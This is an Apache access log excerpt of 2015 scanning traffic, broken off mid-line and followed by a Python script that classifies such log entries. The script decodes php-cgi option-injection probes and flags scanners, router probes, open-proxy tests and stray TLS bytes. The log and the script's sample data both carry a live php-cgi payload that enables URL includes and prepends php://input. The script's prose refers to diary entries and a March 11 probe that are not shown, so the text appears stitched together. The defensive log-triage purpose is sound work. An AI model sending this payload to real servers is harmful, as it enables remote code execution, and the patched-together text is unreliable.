188.138.17.205 - - [06/Mar/2015:21:33:14 +0000] "GET / HTTP/1.1" 200 460 "-" "-"
182.118.53.116 - - [06/Mar/2015:21:39:53 +0000] "GET / HTTP/1.1" 200 427 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2251.0 Safari/537.36"
54.81.139.232 - - [06/Mar/2015:23:53:11 +0000] "HEAD / HTTP/1.1" 200 283 "-" "Cloud mapping experiment. Contact research@pdrlabs.net"
74.118.89.171 - - [07/Mar/2015:13:21:30 +0000] "GET /tmUnblock.cgi HTTP/1.1" 400 525 "-" "-"
54.198.22.218 - - [07/Mar/2015:13:53:36 +0000] "HEAD / HTTP/1.1" 200 283 "-" "Cloud mapping experiment. Contact research@pdrlabs.net"
61.240.144.66 - - [07/Mar/2015:22:55:25 +0000] "GET / HTTP/1.0" 200 453 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
54.166.201.51 - - [08/Mar/2015:01:53:22 +0000] "HEAD / HTTP/1.1" 200 283 "-" "Cloud mapping experiment. Contact research@pdrlabs.net"
54.147.26.255 - - [08/Mar/2015:02:40:44 +0000] "HEAD / HTTP/1.0" 200 276 "-" "-"
54.147.26.255 - - [08/Mar/2015:02:40:54 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2
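As an added example (not code from this page), the following Python script does over an access.log what the diary entries above do by hand: it parses Common Log Format lines, URL-decodes the php-cgi query of the March 8 probe back into its `-d` option list, recognises the tmUnblock.cgi router probe, absolute-URI requests that test for an open proxy, the well-known scanner user agents in the excerpt, and a request whose first bytes are the TLS record header 0x16 0x03 that the March 11 probe sent to port 80. The sample lines are constructed here by adapting the excerpt: the php-cgi query is shortened to two options, and the TLS line's timestamp, status and size are invented (Apache writes non-printable request bytes into the log as `\xNN` escapes, which is the form the classifier matches).

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample, adapted from the access.log excerpt above.
SAMPLE_LOG = r"""
206.82.85.41 - - [04/Mar/2015:10:43:20 +0000] "GET /tmUnblock.cgi HTTP/1.1" 400 525 "-" "-"
115.159.63.139 - - [04/Mar/2015:11:19:35 +0000] "GET http://www.mafengwo.com/ HTTP/1.1" 200 446 "-" "Mozilla/5.0"
61.240.144.66 - - [05/Mar/2015:16:40:26 +0000] "GET / HTTP/1.0" 200 453 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
54.147.26.255 - - [08/Mar/2015:02:40:54 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74 HTTP/1.1" 404 470 "-" "-"
146.0.32.3 - - [11/Mar/2015:09:00:00 +0000] "\x16\x03\x01" 400 0 "-" "-"
188.138.17.205 - - [03/Mar/2015:18:39:36 +0000] "GET / HTTP/1.1" 200 460 "-" "-"
"""

CLF = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
                 r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')

# php.ini directives seen in the decoded March 8 probe; php-cgi accepts them
# through its -d switch, which is what the probe relies on.
PHP_CGI_OPTIONS = {"allow_url_include", "safe_mode", "suhosin.simulation",
                   "disable_functions", "open_basedir", "auto_prepend_file",
                   "cgi.force_redirect", "cgi.redirect_status_env"}
SCANNER_UA = ("masscan", "Nmap Scripting Engine", "netscan.gtisc", "Morfeus",
              "Cloud mapping experiment")


def decode_php_cgi_probe(target):
    """Return the decoded -d option string if the query looks like php-cgi
    option injection, else None."""
    query = unquote_plus(urlsplit(target).query)
    keys = set(re.findall(r"(?:^|\s)-d\s+([A-Za-z_.]+)=", query))
    return query if keys & PHP_CGI_OPTIONS else None


def classify(entry):
    """Map one parsed log entry to a (tag, detail) pair."""
    req, ua = entry["req"], entry["ua"]
    if req.startswith(r"\x16\x03"):           # TLS record header on the plaintext port
        return "tls-on-http-port", req
    parts = req.split(" ")
    if len(parts) < 2:
        return "malformed-request", req
    target = parts[1]
    probe = decode_php_cgi_probe(target)
    if probe is not None:
        return "php-cgi-option-injection", probe
    if urlsplit(target).scheme in ("http", "https"):   # absolute URI: open-proxy test
        return "open-proxy-probe", target
    if urlsplit(target).path == "/tmUnblock.cgi":
        return "router-tmunblock-probe", target
    for marker in SCANNER_UA:
        if marker in ua:
            return "scanner", marker
    return "ordinary", target


def summarize(log_text):
    """Parse every CLF line and return a list of (ip, tag, detail)."""
    rows = []
    for line in log_text.splitlines():
        m = CLF.match(line)
        if not m:
            continue          # blank line or not in Common Log Format
        tag, detail = classify(m.groupdict())
        rows.append((m.group("ip"), tag, detail))
    return rows


if __name__ == "__main__":
    for ip, tag, detail in summarize(SAMPLE_LOG):
        print("%-16s %-26s %s" % (ip, tag, detail))
```

The php-cgi check keys on the decoded `-d directive=` shape rather than on percent-encoding alone, since the same probe arrives in plain text from some sources; the TLS check is deliberately narrow (record type 0x16 and major version 0x03) so that other binary junk in the request field is reported as malformed rather than as a TLS attempt.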